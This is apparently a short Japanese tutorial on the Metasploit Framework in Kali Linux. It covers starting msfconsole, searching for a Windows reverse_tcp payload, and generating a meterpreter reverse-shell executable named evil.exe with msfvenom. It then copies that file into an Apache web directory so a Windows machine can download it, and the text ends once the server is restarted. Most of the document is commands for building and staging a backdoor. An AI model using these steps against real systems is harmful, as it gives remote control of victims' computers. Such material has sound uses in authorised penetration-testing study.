Metasploit Flamework
KaliLinux には
Metasploit がインストールされているので
1 | msfconsole |
を実行すると
msf コンソールが起動して利用することができる
1 | msf5 > |
となっていれば起動成功
この状態で
1 | banner |
と入力するとランダムでアスキーアートが表示される
1 | show -h |
でヘルプの表示
1 | show exploits |
で Metasploit で使用できる Exploit が表示される
Metasploit に含まれるモジュールを実行するにはパスが必要
これには seach コマンドでパスの検索ができる
Windows 向け
TPC リバースシェル
ペイロード
という条件で探すなら
1 | search type:payload reverse_tcp platform:windows |
というようになる
次にペイロードの作成
これは
msfvenom コマンドを使う
このコマンドのオプションについては
https://ko-tech.net/hack/metasploit.html
を参考に
今回使用したオプションは
p ペイロードのパス
f 出力ファイル形式
o 出力ファイルパス
LHOST 接続先のIPアドレス
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.134 -f exe -o /root/Desktop/evil.exe |
を実行すると
デスクトップに eveil.exe が作成される
つぎに
Windows からブラウザでこのペイロードにアクセスできるようにする
別の Terminal を ctrl + alt + t で開き
1 2 3 4 | cd /var/www/html/mkdir sharecp /root/Desktop/evil.exe share/chmod -R 755 share/ |
で
share ディレクトリを作成し、ここへ evil.exe をコピーし
アクセス権限を変更
1 | service apache2 restart |
でwebサーバーを再起動